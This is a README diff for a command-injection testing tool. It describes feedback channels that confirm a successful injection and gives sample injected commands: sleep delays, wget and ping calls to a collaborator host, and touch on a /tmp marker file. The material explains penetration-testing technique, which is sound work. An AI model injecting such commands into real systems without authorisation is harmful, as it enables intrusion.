ewilded/shelling/README.md

 A feedback channel is simply the way we collect the indicator of a successful injection.

 Hence, for command injection, we can have the following feedback channels:
-- directly returned output (all the above examples except the last one)
+- output (all the above examples except the last one use directly returned output, could as well be indirectly returned, e.g. visible in some other module, put into a file, sent via email and so on, all depending on what the vulnerable feature does and how it returns results)
 - response time (e.g. commands like sleep 30 will case noticeable half-minute delay, confirming that the injection was successful, however this will not work with asynchronous scripts)
 - network traffic, like reverse HTTP connections (wget http://a.collaborator.example.org), ICMP ping requests or/and DNS lookups (ping sub.a.collaborator.example.org)
 - file system (if we have access to it; we can attempt to inject commands like `touch /tmp/cmdinject` and then inspect the `/tmp` directory if the file was created - or have the customer to do it for us)